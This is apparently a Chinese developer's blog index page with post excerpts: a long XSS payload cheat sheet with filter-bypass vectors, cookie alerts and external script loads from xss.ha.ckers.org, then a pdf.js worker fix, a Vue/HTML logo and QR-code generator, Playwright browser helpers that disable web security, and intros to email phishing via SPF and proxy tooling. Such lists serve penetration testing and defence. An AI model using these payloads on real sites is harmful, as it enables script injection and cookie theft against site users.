我的GitHub

无星的小窝

技术为辅,业务为主

0%

发表于 分类于 阅读次数:
本文字数: 5.9k 阅读时长 ≈ 5 分钟 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
<script>alert('XSS')</script>

"><script>alert('XSS')</script><"

<svg onload=alert('XSS')>

<!-- 使用<a>标签 -->
<a href="javascript:alert('XSS')">点击我</a>

<!-- 使用<img>标签 -->
<img src="x" onerror="alert('XSS')">

<!-- 使用<iframe>标签 -->
<iframe src="javascript:alert('XSS')"></iframe>

<!-- 使用<button>标签 -->
<button onclick="alert('XSS')">点击我</button>

<!-- 使用<input>标签 -->
<input type="button" onclick="alert('XSS')" value="点击我">

<!-- URL编码 -->
<a href="javascript:%61%6C%65%72%74%28%31%29">点击我</a>

<!-- JavaScript Unicode编码 -->
<script>alert('\u0058\u0053\u0053')</script>

>"'><img src="javascript.:alert('XSS')">

>"'><script>alert('XSS')</script>

<table background='javascript.:alert(([code])'></table>

<object type=text/html data='javascript.:alert(([code]);'></object>

"+alert('XSS')+"

'><script>alert(document.cookie)</script>

='><script>alert(document.cookie)</script>

<script>alert(document.cookie)</script>

<script>alert(vulnerable)</script>

<s&#99;ript>alert('XSS')</script>

<img src="javas&#99;ript:alert('XSS')">

%0a%0a<script>alert(\"Vulnerable\")</script>.jsp

%3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e

%3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e

%3cscript%3ealert(%22xss%22)%3c/script%3e/index.html

a.jsp/<script>alert('Vulnerable')</script>

"><script>alert('Vulnerable')</script>

<IMG SRC="javascript.:alert('XSS');">

<IMG src="/javascript.:alert"('XSS')>

<IMG src="/JaVaScRiPt.:alert"('XSS')>

<IMG src="/JaVaScRiPt.:alert"(&quot;XSS&quot;)>

<IMG SRC="jav&#x09;ascript.:alert('XSS');">

<IMG SRC="jav&#x0A;ascript.:alert('XSS');">

<IMG SRC="jav&#x0D;ascript.:alert('XSS');">

"<IMG src="/java"\0script.:alert(\"XSS\")>";'>out

<IMG SRC=" javascript.:alert('XSS');">

<SCRIPT>a=/XSS/alert(a.source)</SCRIPT>

<BODY BACKGROUND="javascript.:alert('XSS')">

<BODY ONLOAD=alert('XSS')>

<IMG DYNSRC="javascript.:alert('XSS')">

<IMG LOWSRC="javascript.:alert('XSS')">

<BGSOUND SRC="javascript.:alert('XSS');">

<br size="&{alert('XSS')}">

<LAYER SRC="http://xss.ha.ckers.org/a.js"></layer>

<LINK REL="stylesheet"HREF="javascript.:alert('XSS');">

<IMG SRC='vbscript.:msgbox("XSS")'>

<META. HTTP-EQUIV="refresh"CONTENT="0;url=javascript.:alert('XSS');">

<IFRAME. src="/javascript.:alert"('XSS')></IFRAME>

<FRAMESET><FRAME. src="/javascript.:alert"('XSS')></FRAME></FRAMESET>

<TABLE BACKGROUND="javascript.:alert('XSS')">

<DIV STYLE="background-image: url(javascript.:alert('XSS'))">

<DIV STYLE="behaviour: url('http://www.how-to-hack.org/exploit.html&#39;);">

<DIV STYLE="width: expression(alert('XSS'));">

<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>

<IMG STYLE='xss:expre\ssion(alert("XSS"))'>

<STYLE. TYPE="text/javascript">alert('XSS');</STYLE>

<STYLE. TYPE="text/css">.XSS{background-image:url("javascript.:alert('XSS')");}</STYLE><A CLASS=XSS></A>

<STYLE. type="text/css">BODY{background:url("javascript.:alert('XSS')")}</STYLE>

<BASE HREF="javascript.:alert('XSS');//">

getURL("javascript.:alert('XSS')")

a="get";b="URL";c="javascript.:";d="alert('XSS');";eval(a+b+c+d);

<XML SRC="javascript.:alert('XSS');">

"> <BODY NLOAD="a();"><SCRIPT>function a(){alert('XSS');}</SCRIPT><"

<SCRIPT. SRC="http://xss.ha.ckers.org/xss.jpg"></SCRIPT>

<IMG SRC="javascript.:alert('XSS')"

<SCRIPT. a=">"SRC="http://xss.ha.ckers.org/a.js"></SCRIPT>

<SCRIPT.=">"SRC="http://xss.ha.ckers.org/a.js"></SCRIPT>

<SCRIPT. a=">"''SRC="http://xss.ha.ckers.org/a.js"></SCRIPT>

<SCRIPT."a='>'"SRC="http://xss.ha.ckers.org/a.js"></SCRIPT>

<SCRIPT>document.write("<SCRI");</SCRIPT>PTSRC="http://xss.ha.ckers.org/a.js"></SCRIPT>

<A HREF=http://www.gohttp://www.google.com/ogle.com/>link</A>

Xss平台

例如:https://xssjs.com/

阅读全文 »

发表于 更新于 分类于 阅读次数:
本文字数: 1.4k 阅读时长 ≈ 1 分钟

报错引流

1
Error: No “GlobalWorkerOptions.workerSrc“ specified.

使用框架

  • vite
  • pdf-js
  • vue3

pnpm

1
pnpm add pdfjs-dist

使用

页面文件

1
2
3
4
5
6
7
8
9
import * as pdfjsLib from 'pdfjs-dist'
// .....其他代码
onMounted(() => {
  pdfjsLib.GlobalWorkerOptions.workerSrc = new URL(
    "pdfjs-dist/build/pdf.worker.min.mjs",
    import.meta.url
  ).toString();
  // pdfjsLib.GlobalWorkerOptions.workerSrc = '../../node_modules/pdfjs-dist/build/pdf.worker.min.mjs';
})

vite.config.ts新增配置

阅读全文 »

发表于 更新于 分类于 阅读次数:
本文字数: 9.3k 阅读时长 ≈ 8 分钟

背景

有一些信息需要生成二维码,让微信能够扫码识别复制粘贴

vue版本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
<template>
  <div>
    <h1>输入文字生成文字 logo</h1>
    <input v-model="companyName" type="text" placeholder="请输入文字">
    <button @click="generateLogo">生成 logo</button>
    <button @click="downloadLogo">下载 logo</button>
    <div id="logo" ref="logoRef" :style="{ backgroundColor: logoBgColor }">{{ logoText }}</div>

    <h1>输入信息生成二维码</h1>
    <input v-model="companyName2" type="text" placeholder="请输入title">
    <br />
    <textarea v-model="address" placeholder="请输入信息" cols="22" rows="5"></textarea>
    <br />
    <button @click="generateQRCode">生成二维码</button>
    <div id="qrcode" v-html="qrcodeHtml"></div>
    <div id="companyNameDisplay">{{ companyName2 }}</div>
  </div>
</template>

<script lang="ts" setup>
import { ref, type Ref } from 'vue';
// 假设 qrcode.min.js 已经安装并导入
import QRCode from 'qrcode-generator';

// 定义响应式变量的类型
const companyName: Ref<string> = ref('');
const logoText: Ref<string> = ref('');
const logoBgColor: Ref<string> = ref('');
const companyName2: Ref<string> = ref('');
const address: Ref<string> = ref('');
const qrcodeHtml: Ref<string> = ref('');
const logoRef: Ref<HTMLElement | null> = ref(null);

const generateLogo = () => {
  if (companyName.value.length === 4) {
    logoText.value = `${companyName.value.slice(0, 2)}\n${companyName.value.slice(2)}`;
  } else {
    logoText.value = companyName.value;
  }
  const randomColor = '#' + Math.floor(Math.random() * 16777215).toString(16);
  logoBgColor.value = randomColor;
};

const downloadLogo = async () => {
  const canvas = document.createElement('canvas');
  const ctx = canvas.getContext('2d');
  const text = logoText.value;
  const color = logoRef.value?.style.backgroundColor || '';

  canvas.width = 2048;
  canvas.height = 2048;

  // 设置字体样式,与页面上的 logo 字体大小一致
  if (ctx) {
    ctx.font = '748px Arial';
    ctx.textAlign = 'center';
    ctx.textBaseline = 'middle';

    // 清空画布
    ctx.clearRect(0, 0, canvas.width, canvas.height);

    // 绘制带圆角的背景
    const radius = 200;
    const x = 0;
    const y = 0;
    const width = 2048;
    const height = 2048;

    ctx.beginPath();
    ctx.moveTo(x + radius, y);
    ctx.lineTo(x + width - radius, y);
    ctx.quadraticCurveTo(x + width, y, x + width, y + radius);
    ctx.lineTo(x + width, y + height - radius);
    ctx.quadraticCurveTo(x + width, y + height, x + width - radius, y + height);
    ctx.lineTo(x + radius, y + height);
    ctx.quadraticCurveTo(x, y + height, x, y + height - radius);
    ctx.lineTo(x, y + radius);
    ctx.quadraticCurveTo(x, y, x + radius, y);
    ctx.closePath();

    ctx.fillStyle = color;
    ctx.fill();

    // 设置文字颜色
    ctx.fillStyle = 'white';

    // 计算文字位置
    const centerX = canvas.width / 2;
    const centerY = canvas.height / 2;

    // 绘制文字
    if (text.includes('\n')) {
      const lines = text.split('\n');
      const lineHeight = 748;
      const totalHeight = lines.length * lineHeight;
      const startY = centerY - totalHeight / 2 + lineHeight / 2;
      lines.forEach((line, index) => {
        ctx.fillText(line, centerX, startY + index * lineHeight);
      });
    } else {
      ctx.fillText(text, centerX, centerY);
    }
  }

  // 创建下载链接
  const link = document.createElement('a');
  link.href = canvas.toDataURL('image/png');
  link.download = companyName.value + 'logo.png';
  link.click();
};

const generateQRCode = () => {
  qrcodeHtml.value = '';
  if (address.value) {
    QRCode.stringToBytes = QRCode.stringToBytesFuncs['UTF-8'];
    const qr = QRCode(0, 'L');
    qr.addData(address.value);
    // qr.addData(unescape(encodeURIComponent(address)));
    qr.make();
    qrcodeHtml.value = qr.createImgTag(4);
  }
};
</script>

<style scoped>
body {
  font-family: Arial, sans-serif;
  text-align: center;
  padding-top: 50px;
}

#logo {
  font-size: 48px;
  font-weight: bold;
  margin-top: 20px;
  padding: 10px;
  border-radius: 20px;
  color: white;
  white-space: pre-line;
  width: 200px;
  height: 200px;
  box-sizing: border-box;
  display: flex;
  justify-content: center;
  align-items: center;
  margin-left: auto;
  margin-right: auto;
}

#qrcode {
  margin-top: 20px;
}
</style>

html版本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
<!DOCTYPE html>
<html lang="zh">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>生成文字 logo</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            text-align: center;
            padding-top: 50px;
        }

        #logo {
            font-size: 48px;
            font-weight: bold;
            margin-top: 20px;
            padding: 10px;
            border-radius: 20px;
            color: white;
            white-space: pre-line;
            width: 200px;
            height: 200px;
            box-sizing: border-box;
            display: flex;
            justify-content: center;
            align-items: center;
            margin-left: auto;
            margin-right: auto;
        }

        #qrcode {
            margin-top: 20px;
        }
    </style>
    <!-- 引入 qrcode.js 库 -->
    <script src="qrcode.min.js"></script>
</head>

<body>
    <h1>输入文字生成文字 logo</h1>
    <input type="text" id="companyName" placeholder="请输入文字名称">
    <button onclick="generateLogo()">生成 logo</button>
    <button id="downloadButton" onclick="downloadLogo()">下载 logo</button>
    <div id="logo"></div>

    <!-- 新增输入框和按钮用于生成二维码 -->
    <h1>输入信息生成二维码</h1>
    <input type="text" id="companyName2" placeholder="请输入title">
    <br />
    <textarea type="text" id="address" placeholder="请输入信息" cols="22" rows="5"></textarea>
    <br />

    <button onclick="generateQRCode()">生成二维码</button>
    <div id="qrcode"></div>
    <div id="companyNameDisplay"></div>

    <script>
        function generateLogo() {
            const companyName = document.getElementById('companyName').value;
            const logoElement = document.getElementById('logo');
            if (companyName.length === 4) {
                logoElement.textContent = `${companyName.slice(0, 2)}\n${companyName.slice(2)}`;
            } else {
                logoElement.textContent = companyName;
            }
            const randomColor = '#' + Math.floor(Math.random() * 16777215).toString(16);
            logoElement.style.backgroundColor = randomColor;
        }

        function downloadLogo() {
            const canvas = document.getElementById('logoCanvas');
            const ctx = canvas.getContext('2d');
            const logoElement = document.getElementById('logo');
            const text = logoElement.textContent;
            const color = logoElement.style.backgroundColor;

            // 设置字体样式,与页面上的 logo 字体大小一致
            ctx.font = '748px Arial';
            ctx.textAlign = 'center';
            ctx.textBaseline = 'middle';

            // 清空画布
            ctx.clearRect(0, 0, canvas.width, canvas.height);

            // 绘制带圆角的背景
            const radius = 200;
            const x = 0;
            const y = 0;
            const width = 2048;
            const height = 2048;

            ctx.beginPath();
            ctx.moveTo(x + radius, y);
            ctx.lineTo(x + width - radius, y);
            ctx.quadraticCurveTo(x + width, y, x + width, y + radius);
            ctx.lineTo(x + width, y + height - radius);
            ctx.quadraticCurveTo(x + width, y + height, x + width - radius, y + height);
            ctx.lineTo(x + radius, y + height);
            ctx.quadraticCurveTo(x, y + height, x, y + height - radius);
            ctx.lineTo(x, y + radius);
            ctx.quadraticCurveTo(x, y, x + radius, y);
            ctx.closePath();

            ctx.fillStyle = color;
            ctx.fill();

            // 设置文字颜色
            ctx.fillStyle = 'white';

            // 计算文字位置
            const centerX = canvas.width / 2;
            const centerY = canvas.height / 2;

            // 绘制文字
            if (text.includes('\n')) {
                const lines = text.split('\n');
                const lineHeight = 748;
                const totalHeight = lines.length * lineHeight;
                const startY = centerY - totalHeight / 2 + lineHeight / 2;
                lines.forEach((line, index) => {
                    ctx.fillText(line, centerX, startY + index * lineHeight);
                });
            } else {
                ctx.fillText(text, centerX, centerY);
            }

            // 创建下载链接
            const link = document.createElement('a');
            link.href = canvas.toDataURL('image/png');
            link.download = companyName + 'logo.png';
            link.click();
        }

        function generateQRCode() {
            const address = document.getElementById('address').value;
            const qrcodeDiv = document.getElementById('qrcode');
            const companyName2 = document.getElementById('companyName2').value;
            const companyNameDisplay = document.getElementById('companyNameDisplay');
            qrcodeDiv.innerHTML = '';
            companyNameDisplay.textContent = '';


            if (address) {
                qrcode.stringToBytes = qrcode.stringToBytesFuncs['UTF-8'];
                const qr = qrcode(0, 'L');
                qr.addData(address);
                // qr.addData(unescape(encodeURIComponent(address)));
                qr.make();
                const img = qr.createImgTag(4);
                qrcodeDiv.innerHTML = img;
            }
            if (companyName2) {
                companyNameDisplay.textContent = companyName2;
            }
        }

    </script>
</body>

</html>
阅读全文 »

发表于 分类于 阅读次数:
本文字数: 2k 阅读时长 ≈ 2 分钟

封装的代码块合集

浏览器的创建

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
const { chromium } = require('playwright');
const authState = require('../auth/auth.json');
const { getOS } = require('../utils/utils');
// 初始化一个页面
const createBrower = async () => {
    const os = getOS()
    // 判断系统类型使用不同参数
    let params = {}
    if (os === 'Windows_NT') {
        params = {
            headless: false,
            // 使用edge浏览器
            channel: 'msedge',
            args: [
              "--start-maximized",
			  "--disable-web-security",
			  "--allow-running-insecure-content"
            ]
        }
    } else {
        params = {
            headless: false,
            // 使用其他浏览器
            executablePath: "/usr/bin/browser360ent-cn",
            args: [
               "--start-maximized",
				"--disable-web-security",
				"--allow-running-insecure-content"
            ]
        }
    }
    const browser = await chromium.launch(params);
    const context = await browser.newContext({
        // 全屏填null
        viewport: null,
        storageState: authState,
        // 忽略https的问题
        ignoreHTTPSErrors: true
    });
    const page = await context.newPage({
    });

    return {
        browser,
        context,
        page
    }
}

module.exports = {
    createBrower,
}

TODO: 手动开启浏览器,链接到已有浏览器

拦截网络请求并替换结果

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
const forbidRequest = async (page) => {
    // 参数可以填请求地址或者正则表达式,例如:/aaa$/以aaa开头的请求
    page.route('参数', async route => {
        // Fetch original response.
        const response = await page.request.fetch(route.request());
        // Add a prefix to the title.
        let body = {}
        // 这里要注意,一定要转json字符串
        const result = JSON.stringify(body)
        route.fulfill({
          // Pass all fields from the response.
          response,
          // Override response body.
          body:result,
        });
      });
}

网页输入框无法输入

本来对于输入框,应该使用page.fill()去输入

但是总有一些奇奇怪怪的情况,无法输入

对于这种情况,我们可以通过page.key去操作键盘输入

阅读全文 »

发表于 分类于 阅读次数:
本文字数: 1.4k 阅读时长 ≈ 1 分钟

背景

几天了,毫无进展

钓鱼试一下把

邮件钓鱼好像很有意思

SPF

首先我们需要了解SPF

SPF的全称是Sender Policy Framework,即发件人策略框架

说简单一点,SMTP框架设置的很简略,允许任何人声明他是谁并给你发邮件,但是其实并不能保证他真的是谁

那么就要打补丁了

补丁就是SPF

阅读全文 »

发表于 分类于 阅读次数:
本文字数: 816 阅读时长 ≈ 1 分钟

背景

有同事不会配,帮忙配了一下,顺带记录成文字

页面介绍

装完长这个样子

1.配置可用的代理服务

我们有时候会起不同的代理服务以应对不同的需求

比如有时候翻墙我们会使用小猫咪或者小飞机

而进行安全测试的时候则使用Burp

开发有时候轻量一点会使用Fiddler或者Charles

阅读全文 »